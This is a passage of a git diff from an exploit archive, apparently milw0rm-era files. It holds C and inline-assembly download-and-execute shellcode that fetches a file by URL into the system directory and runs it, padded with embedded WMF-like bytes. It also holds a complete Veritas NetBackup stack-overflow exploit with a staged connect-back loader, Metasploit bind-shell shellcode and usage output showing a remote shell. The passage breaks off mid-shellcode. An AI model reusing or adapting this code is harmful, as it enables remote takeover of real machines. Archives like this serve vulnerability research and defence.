0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, + 0x65, 0x65, 0x0C, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0C, 0x00, + 0x0B, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, + 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, + 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x2C, 0x02, 0x43, 0x03, + 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x08, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, + 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x15, 0x00, 0x00, 0x00, + 0x32, 0x0A, 0x46, 0x02, 0xD2, 0x01, 0x09, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, + 0x65, 0x65, 0x20, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x0B, 0x00, 0x06, 0x00, 0x06, 0x00, + 0x0B, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, + 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, + 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x32, 0x0A, + 0x60, 0x02, 0xD2, 0x01, 0x04, 0x00, 0x00, 0x00, 0x7A, 0x56, 0x41, 0x44, 0x09, 0x00, 0x0F, 0x00, + 0x0F, 0x00, 0x10, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, + 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 
0x60, 0x02, + 0x09, 0x02, 0x01, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, + 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, + 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0C, 0x3F, + 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x0E, 0x02, 0x03, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x00, + 0x08, 0x00, 0x12, 0x00, 0x0B, 0x00, 0x04, 0x00, 0x30, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, + 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, + 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, + 0x60, 0x02, 0x38, 0x02, 0x01, 0x00, 0x00, 0x00, 0x3D, 0x00, 0x0C, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, + 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, + 0x21, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x4A, 0x02, 0x11, 0x00, 0x00, 0x00, 0x65, 0x65, + 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x00, + 0x0B, 0x00, 0x0B, 0x00, 0x0B, 0xAF, 0x0A, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0B, 0x00, + 0x0A, 0x00, 0x0A, 0x00, 0x0B, 0x00, 0x09, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x0B, 0x00, + 0x06, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, + 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0xDD, + 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x02, 0x01, 
0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0xF6, 0x02, + 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x07, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, + 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x10, 0x00, 0x00, 0x00, + 0x32, 0x0A, 0x60, 0xEB, 0xFD, 0x02, 0x06, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, + 0x0B, 0x00, 0x0B, 0x00, 0x06, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, + 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, + 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, + 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x34, 0x03, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, + 0x07, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, + 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, + 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x12, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x3B, 0x03, + 0x07, 0x00, 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x00, 0x0B, 0x00, 0x05, 0x00, + 0x0C, 0x00, 0x0C, 0x4F, 0x05, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, + 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, + 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, + 0x00, 0x00, 0x32, 0x0A, 0x60, 0x02, 0x7D, 0x03, 0x01, 0x00, 
0x00, 0x00, 0x2D, 0x00, 0x08, 0x00, + 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, + 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, + 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0xF7, 0x62, 0x00, + 0x02, 0x01, 0x01, 0x00, 0x31, 0x00, 0x00, 0xC3, 0x32, 0x0A, 0x79, 0x02, 0xD2, 0x01, 0x1C, 0x00, + 0x00, 0x00, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, + 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x0B, 0x00, + 0x08, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x08, 0x00, 0x07, 0x00, 0x0B, 0x00, 0x07, 0x00, 0x0A, 0x00, + 0x05, 0x00, 0x08, 0x00, 0x06, 0x00, 0x0B, 0x00, 0x0C, 0x00, 0x08, 0x00, 0x0B, 0x00, 0x11, 0x00, + 0x0A, 0x00, 0x08, 0x00, 0x0C, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x07, 0x00, + 0x0C, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x04, 0x00, + 0x00, 0x00, 0x2D, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x04, 0x00, 0x10, 0x00, + 0x00, 0x00, 0xFB, 0x02, 0x10, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBC, 0x02, 0x00, 0x00, + 0x00, 0xEE, 0x01, 0x02, 0x02, 0x22, 0x53, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x00, 0xEE, 0x04, 0x00, + 0x00, 0x00, 0x2D, 0x01, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0xF0, 0x01, 0x03, 0x00, 0x0F, 0x00, + 0x00, 0x00, 0x26, 0x06, 0x0F, 0x00, 0x14, 0x00, 0x54, 0x4E, 0x50, 0x50, 0x04, 0x00, 0x0C, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00, + 0x26, 0x06, 0x0F, 0x00, 0x08, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, 0x01, 0x00, 0x00, 0x00, 0x03, 0x00, + 0x00, 0x00, 0x00, 0x00 +}; + + +// Shellcode string +unsigned char sc[1024] = {0}; +unsigned int Sc_len; + +// ASM shellcode main function +void ShellCode(); + +// Get function hash +static DWORD 
__stdcall GetHash ( char *c )
+{
+ DWORD h = 0;
+
+ while ( *c )
+ {
+ __asm ror h, HASH_KEY
+
+ h += *c++;
+ }
+ return( h );
+}
+
+void Make_ShellCode(char *url1)
+{
+ unsigned char *pSc_addr;
+ unsigned int Enc_key=ENC_KEY;
+ unsigned long dwHash[100];
+ unsigned int dwHashSize;
+ int i,j,k,l;
+
+
+ // Get functions hash
+ //printf("[+] Get functions hash strings.\r\n");
+ for (i=0;;i++)
+ {
+ if (functions[i][0] == '\x0') break;
+
+ dwHash[i] = GetHash((char*)functions[i]);
+ //printf("\t%.8X\t%s\n", dwHash[i], functions[i]);
+ }
+ dwHashSize = i*4;
+
+
+ // Deal with shellcode
+ pSc_addr = (unsigned char *)ShellCode;
+
+ for (k=0;k0; i--)
+ {
+ l = 0;
+ for(j=DECODE_LEN; j ebx)
+ dec ebx
+ xor ecx,ecx
+ mov cl,0xFF // Decode len
+
+ decode_loop:
+ xor byte ptr [ebx+ecx],ENC_KEY // Decode key
+ loop decode_loop
+ jmp short decode_ok
+
+decode_end:
+ call decode_start
+
+decode_ok:
+
+//--------------------------------------------------------------------
+//
+// ShellCode
+//
+//--------------------------------------------------------------------
+ jmp sc_end
+
+sc_start:
+ pop edi // Hash string start addr (esp -> edi)
+
+ // Get kernel32.dll base addr
+ mov eax, fs:0x30 // PEB
+ mov eax, [eax+0x0c] // PROCESS_MODULE_INFO
+ mov esi, [eax+0x1c] // InInitOrder.flink
+ lodsd // eax = InInitOrder.blink
+ mov ebp, [eax+8] // ebp = kernel32.dll base address
+
+ mov esi, edi // Hash string start addr -> esi
+
+ // Get function addr of kernel32
+ push 4
+ pop ecx
+
+ getkernel32:
+ call GetProcAddress_fun
+ loop getkernel32
+
+ // Get function addr of urlmon
+ push 0x00006e6f
+ push 0x6d6c7275 // urlmon
+ push esp
+ call ADDR_LoadLibraryA // LoadLibraryA("urlmon");
+
+ mov ebp, eax // ebp = urlmon.dll base address
+
+/*
+ push 1
+ pop ecx
+
+ geturlmon:
+ call GetProcAddress_fun
+ loop geturlmon
+*/
+ call GetProcAddress_fun
+
+ // url start addr = edi
+
+LGetSystemDirectoryA:
+ sub esp, 0x20
+ mov ebx, esp
+
+ push 0x20
+ push ebx
+ call ADDR_GetSystemDirectoryA //
GetSystemDirectoryA
+
+LURLDownloadToFileA:
+ // eax = system path size
+ // URLDownloadToFileA url save to a.exe
+ mov dword ptr [ebx+eax], 0x652E555C // "\U.e"
+ mov dword ptr [ebx+eax+0x4], 0x00006578 // "xe"
+ xor eax, eax
+ push eax
+ push eax
+ push ebx // %systemdir%\U.exe
+ push edi // url
+ push eax
+call ADDR_URLDownloadToFileA // URLDownloadToFileA
+
+//LWinExec:
+ mov ebx, esp
+ push 1//executes in SW_SHOW, push 0 if you wanna in SW_HIDE..
+ push ebx
+ call ADDR_WinExec // WinExec(%systemdir%\a.exe);
+
+Finished:
+ //push 1
+ call ADDR_ExitProcess // ExitProcess();
+
+GetProcAddress_fun:
+ push ecx
+ push esi
+
+ mov esi, [ebp+0x3C] // e_lfanew
+ mov esi, [esi+ebp+0x78] // ExportDirectory RVA
+ add esi, ebp // rva2va
+ push esi
+ mov esi, [esi+0x20] // AddressOfNames RVA
+ add esi, ebp // rva2va
+ xor ecx, ecx
+ dec ecx
+
+ find_start:
+ inc ecx
+ lodsd
+ add eax, ebp
+ xor ebx, ebx
+
+ hash_loop:
+ movsx edx, byte ptr [eax]
+ cmp dl, dh
+ jz short find_addr
+ ror ebx, HASH_KEY // hash key
+ add ebx, edx
+ inc eax
+ jmp short hash_loop
+
+ find_addr:
+ cmp ebx, [edi] // compare to hash
+ jnz short find_start
+ pop esi // ExportDirectory
+ mov ebx, [esi+0x24] // AddressOfNameOrdinals RVA
+ add ebx, ebp // rva2va
+ mov cx, [ebx+ecx*2] // FunctionOrdinal
+ mov ebx, [esi+0x1C] // AddressOfFunctions RVA
+ add ebx, ebp // rva2va
+ mov eax, [ebx+ecx*4] // FunctionAddress RVA
+ add eax, ebp // rva2va
+ stosd // function address save to [edi]
+
+ pop esi
+ pop ecx
+ ret
+
+sc_end:
+ call sc_start
+
+ PROC_END //C macro to end proc
+ }
+}
+
+// milw0rm.com [2006-01-15]
diff --git a/platforms/windows/remote/1421.cpp b/platforms/windows/remote/1421.cpp
index d6d55b62a..c216ef86d 100755
--- a/platforms/windows/remote/1421.cpp
+++ b/platforms/windows/remote/1421.cpp
@@ -1,249 +1,249 @@
-/*
-
- DESCRIPTION
-
- Veritas NetBackup Stack Overflow (tcp/13701)
- "Volume Manager Daemon" Module
-
- Advisories
- http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336
- http://www.frsirt.com/english/advisories/2005/2349
-
- USAGE
-
- C:\NetBackup>nb 192.168.0.2 4444 192.168.0.200 0
- Veritas NetBackup v4/v5 "Volume Manager Daemon" Stack Overflow.
- Sending first buffer.
- Sending second buffer.
-
- C:\NetBackup>nc 192.168.0.200 4444
- Microsoft Windows 2000 [versie 5.00.2195]
- (C) Copyright 1985-2000 Microsoft Corp.
-
- C:\WINNT\system32>
-
- INFORMATION
-
- I wrote this just for educational purposes :).
-
- Because the buffer is only very small, I had to write small shellcode.
- The code is less than 100 bytes, and there are 6 bytes left. So there
- is still space to improve it. The stack seems to be static, every run
- at the exact same location.
-
- I used the Import Address Table (that looks like this):
-
- (taken from v5.1)
- Import Address Table
- 00447230 (send)
- 00447234 (recv)
- 00447238 (accept)
- 00447240 (listen)
- 0044724C (connect)
- 00447268 (closesocket)
- 00447284 (bind)
- 00447288 (socket)
-
- Using that shellcode I retrieve the "second" shellcode. This can be ANY
- code, and ANY size. No limitations.
-
- Tested on Windows 2000 Professional, Service Pack 4, Dutch.
- Tested on Veritas NetBackup 4.5, 5.0, 5.1 with some Maintenance Packs.
- (not all).
-
- Enjoy.
-
-*/
-#include
-#include
-#pragma comment(lib,"ws2_32")
-
-DWORD WINAPI SendShellcode(LPVOID lpParam);
-int iLocalOpenPort;
-
-/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
-char szShellcode[] =
- "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd2"
- "\x4a\xe7\xed\x83\xeb\xfc\xe2\xf4\x2e\x20\x0c\xa0\x3a\xb3\x18\x12"
- "\x2d\x2a\x6c\x81\xf6\x6e\x6c\xa8\xee\xc1\x9b\xe8\xaa\x4b\x08\x66"
- "\x9d\x52\x6c\xb2\xf2\x4b\x0c\xa4\x59\x7e\x6c\xec\x3c\x7b\x27\x74"
- "\x7e\xce\x27\x99\xd5\x8b\x2d\xe0\xd3\x88\x0c\x19\xe9\x1e\xc3\xc5"
- "\xa7\xaf\x6c\xb2\xf6\x4b\x0c\x8b\x59\x46\xac\x66\x8d\x56\xe6\x06"
- "\xd1\x66\x6c\x64\xbe\x6e\xfb\x8c\x11\x7b\x3c\x89\x59\x09\xd7\x66"
- "\x92\x46\x6c\x9d\xce\xe7\x6c\xad\xda\x14\x8f\x63\x9c\x44\x0b\xbd"
- "\x2d\x9c\x81\xbe\xb4\x22\xd4\xdf\xba\x3d\x94\xdf\x8d\x1e\x18\x3d"
- "\xba\x81\x0a\x11\xe9\x1a\x18\x3b\x8d\xc3\x02\x8b\x53\xa7\xef\xef"
- "\x87\x20\xe5\x12\x02\x22\x3e\xe4\x27\xe7\xb0\x12\x04\x19\xb4\xbe"
- "\x81\x19\xa4\xbe\x91\x19\x18\x3d\xb4\x22\xf6\xb1\xb4\x19\x6e\x0c"
- "\x47\x22\x43\xf7\xa2\x8d\xb0\x12\x04\x20\xf7\xbc\x87\xb5\x37\x85"
- "\x76\xe7\xc9\x04\x85\xb5\x31\xbe\x87\xb5\x37\x85\x37\x03\x61\xa4"
- "\x85\xb5\x31\xbd\x86\x1e\xb2\x12\x02\xd9\x8f\x0a\xab\x8c\x9e\xba"
- "\x2d\x9c\xb2\x12\x02\x2c\x8d\x89\xb4\x22\x84\x80\x5b\xaf\x8d\xbd"
- "\x8b\x63\x2b\x64\x35\x20\xa3\x64\x30\x7b\x27\x1e\x78\xb4\xa5\xc0"
- "\x2c\x08\xcb\x7e\x5f\x30\xdf\x46\x79\xe1\x8f\x9f\x2c\xf9\xf1\x12"
- "\xa7\x0e\x18\x3b\x89\x1d\xb5\xbc\x83\x1b\x8d\xec\x83\x1b\xb2\xbc"
- "\x2d\x9a\x8f\x40\x0b\x4f\x29\xbe\x2d\x9c\x8d\x12\x2d\x7d\x18\x3d"
- "\x59\x1d\x1b\x6e\x16\x2e\x18\x3b\x80\xb5\x37\x85\x22\xc0\xe3\xb2"
- "\x81\xb5\x31\x12\x02\x4a\xe7\xed";
-
-char szBuffer[] =
- // We cannot use this small part.
- "a"
- "AAAAAAAAAAAAAAAAAAAA"
- "AAAAAAAAAAAAAAAAAAAA"
- "AAAAAAAAAAAAAAAAAAAA"
- "AAAAAAAAAAAAAAAAAAA"
-
- // Since the buffer is so small, we even need a part of
- // the SOCKADDR_IN structure. No problem.
-
- // struct sockaddr_in {
- "BB" // sin_family
- "BB" // sin_port
- "BBBB" // in_addr
- // "BBBBBBBB" // sin_zero
- // }
-
- // 'START'
-
- // Move the stackpointer. (0x0012F??? -> 0x0012F000)
- "\xC1\xEC\x0C" // SHR ESP, 0x0C
- "\xC1\xE4\x0C" // SHL ESP, 0x0C
-
- // Call socket().
- "\x33\xDB" // XOR EBX, EBX
- "\x53" // PUSH EBX
- "\x43" // INC EBX
- "\x53" // PUSH EBX
- "\x43" // INC EBX
- "\x53" // PUSH EBX
- "\xBB\x88\x72\x44\x00" // MOV EBX, 447288 [socket()]
- "\xFF\x13" // JMP DWORD PTR [EBX]
- "\x8B\xF8" // MOV EDI, EAX
- // [edi -> socket]
-
- // Call connect().
- "\x33\xDB" // XOR EBX, EBX
- "\xB3\x16" // MOV BL, 16
- "\x53" // PUSH EBX
- "\xBB\x60\xF3\x12\x00" // MOV EBX, 12F360
- "\x53" // PUSH EBX
- "\x57" // PUSH EDI
- "\xBB\x4C\x72\x44\x00" // MOV EBX, 44724C [connect()]
- "\xFF\x13" // JMP DWORD PTR [EBX]
-
- // We need space.
- "\x8B\xD4" // MOV EDX, ESP
- "\x80\xC6\x01" // ADD DH, 1
-
- // Call recv().
- "\x33\xDB" // XOR EBX, EBX
- "\x53" // PUSH EBX
- "\x43" // INC EBX
- "\xC1\xE3\x10" // SHL EBX, 8 [1 -> 65536]
- "\x53" // PUSH EBX
- "\x52" // PUSH EDX
- "\x57" // PUSH EDI
- "\xBB\x34\x72\x44\x00" // MOV EBX, 447234 [recv()]
- "\xFF\x13" // JMP DWORD PTR [EBX]
-
- // And again.
- "\x8B\xD4" // MOV EDX, ESP
- "\x80\xC6\x01" // ADD DH, 1
-
- // Jump to our shellcode.
- "\xFF\xE2" // JMP EDX
-
- "O"
- "W"
- "N"
- "E"
- "D"
- "!"
-
- "\x68\xF3\x12\x00" // Here our code starts :).
- "\x00\xF0\x12\x00"; // Just a random readable address.
-
-// This is the NOT-interesting part :).
-
-DWORD main(int argc, char *argv[]) {
- printf("Veritas NetBackup v4/v5/v6 \"Volume Manager Daemon\" Stack Overflow.\n");
-
- // We need a local port and ip because our first buffer is way too small
- // to contain our complete shellcode. We use a small shellcode first to
- // retrieve the second shellcode. The only method that fitted as first
- // shellcode was a connect-back shellcode. For the second we got LOADS of
- // space :).
- if (argc<5) {
- printf("Usage: %s \n\n", argv[0]);
- printf("Types (tested):\n");
- printf(" 0 - NetBackup v5.0_1A\n");
- printf(" NetBackup v5.0_2\n");
- printf(" NetBackup v5.0_3\n");
- printf(" NetBackup v5.1\n\n");
- return NULL;
- }
-
- WSADATA wsa;
- WSAStartup(MAKEWORD(2,0), &wsa);
-
- sockaddr_in strTarget;
- memset(&strTarget, 0, sizeof(strTarget));
- strTarget.sin_addr.s_addr = inet_addr(argv[3]);
- strTarget.sin_family = AF_INET;
- strTarget.sin_port = htons(13701);
-
- iLocalOpenPort = atoi(argv[2]);
- HANDLE hStage2 = CreateThread(NULL, 0, SendShellcode, 0, 0, 0);
-
- SOCKET sTarget = socket(AF_INET, SOCK_STREAM, 0);
- int iResult = connect(sTarget, (struct sockaddr *)&strTarget, sizeof(strTarget));
-
- if (iResult != SOCKET_ERROR) {
- printf("Sending first buffer.\n");
- // Fill in the structure.
- unsigned long family = AF_INET;
- memcpy(szBuffer + 80, &family, 2);
- unsigned long port = htons(iLocalOpenPort);
- memcpy(szBuffer + 82, &port, 2);
- unsigned long ip = inet_addr(argv[1]);
- memcpy(szBuffer + 84, &ip, 4);
-
- send(sTarget, szBuffer, sizeof(szBuffer)-1, 0);
- closesocket(sTarget);
- }
-
- WaitForSingleObject(hStage2, 3000);
- WSACleanup();
- return NULL;
-}
-
-DWORD WINAPI SendShellcode(LPVOID lpParam) {
- SOCKET sTarget;
- SOCKET sAccept;
- struct hostent *hp;
- struct sockaddr_in strTarget;
- struct sockaddr_in strAccept;
-
- int iStrSize = sizeof(strTarget);
-
- memset(&strTarget, 0, sizeof(strTarget));
- strTarget.sin_addr.s_addr = INADDR_ANY;
- strTarget.sin_family = AF_INET;
- strTarget.sin_port = htons(iLocalOpenPort);
-
- sTarget = socket(AF_INET, SOCK_STREAM, 0);
- bind(sTarget, (struct sockaddr *)&strTarget, iStrSize);
- listen(sTarget, 2);
- sAccept = accept(sTarget, (struct sockaddr *)&strAccept, &iStrSize);
-
- if (sAccept != INVALID_SOCKET) {
- printf("Sending second buffer.\n");
- send(sAccept, szShellcode, sizeof(szShellcode) - 1, 0);
- closesocket(sAccept);
- }
-
- return NULL;
-}
-
-// milw0rm.com [2006-01-16]
+/*
+
+
DESCRIPTION
+
+ Veritas NetBackup Stack Overflow (tcp/13701)
+ "Volume Manager Daemon" Module
+
+ Advisories
+ http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336
+ http://www.frsirt.com/english/advisories/2005/2349
+
+ USAGE
+
+ C:\NetBackup>nb 192.168.0.2 4444 192.168.0.200 0
+ Veritas NetBackup v4/v5 "Volume Manager Daemon" Stack Overflow.
+ Sending first buffer.
+ Sending second buffer.
+
+ C:\NetBackup>nc 192.168.0.200 4444
+ Microsoft Windows 2000 [versie 5.00.2195]
+ (C) Copyright 1985-2000 Microsoft Corp.
+
+ C:\WINNT\system32>
+
+ INFORMATION
+
+ I wrote this just for educational purposes :).
+
+ Because the buffer is only very small, I had to write small shellcode.
+ The code is less than 100 bytes, and there are 6 bytes left. So there
+ is still space to improve it. The stack seems to be static, every run
+ at the exact same location.
+
+ I used the Import Address Table (that looks like this):
+
+ (taken from v5.1)
+ Import Address Table
+ 00447230 (send)
+ 00447234 (recv)
+ 00447238 (accept)
+ 00447240 (listen)
+ 0044724C (connect)
+ 00447268 (closesocket)
+ 00447284 (bind)
+ 00447288 (socket)
+
+ Using that shellcode I retrieve the "second" shellcode. This can be ANY
+ code, and ANY size. No limitations.
+
+ Tested on Windows 2000 Professional, Service Pack 4, Dutch.
+ Tested on Veritas NetBackup 4.5, 5.0, 5.1 with some Maintenance Packs.
+ (not all).
+
+ Enjoy.
+
+*/
+#include
+#include
+#pragma comment(lib,"ws2_32")
+
+DWORD WINAPI SendShellcode(LPVOID lpParam);
+int iLocalOpenPort;
+
+/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
+char szShellcode[] =
+ "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd2"
+ "\x4a\xe7\xed\x83\xeb\xfc\xe2\xf4\x2e\x20\x0c\xa0\x3a\xb3\x18\x12"
+ "\x2d\x2a\x6c\x81\xf6\x6e\x6c\xa8\xee\xc1\x9b\xe8\xaa\x4b\x08\x66"
+ "\x9d\x52\x6c\xb2\xf2\x4b\x0c\xa4\x59\x7e\x6c\xec\x3c\x7b\x27\x74"
+ "\x7e\xce\x27\x99\xd5\x8b\x2d\xe0\xd3\x88\x0c\x19\xe9\x1e\xc3\xc5"
+ "\xa7\xaf\x6c\xb2\xf6\x4b\x0c\x8b\x59\x46\xac\x66\x8d\x56\xe6\x06"
+ "\xd1\x66\x6c\x64\xbe\x6e\xfb\x8c\x11\x7b\x3c\x89\x59\x09\xd7\x66"
